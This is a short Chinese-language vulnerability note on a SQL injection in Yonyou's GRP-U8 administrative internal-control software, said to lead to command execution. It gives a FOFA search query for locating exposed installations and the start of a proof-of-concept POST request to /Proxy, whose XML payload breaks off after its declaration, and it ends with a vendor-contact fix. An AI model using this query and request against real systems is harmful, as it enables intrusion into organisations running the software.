用友GRP-U8行政事业内控管理软件SQL注入漏洞
漏洞信息:¶
用友公司成立于1988年,全面提供具有自主知识产权的企业管理/ERP软件、服务与解决方案,是中国最大的管理软件、ERP软件、集团管理软件、人力资源管理软件、客户关系管理软件及小型企业管理软件提供商。其GRP-U8行政事业内控管理软件特定版本存在SQL注入漏洞,可用于命令执行执行。
漏洞复现:¶
fofa_dork: “用友GRP-u8”
POC:¶
``` POST /Proxy HTTP/1.1 Accept: Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: host Content-Length: 357 Connection: Keep-Alive Cache-Control: no-cache
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?>
修复方案:¶
联系用友官方获得安全升级方案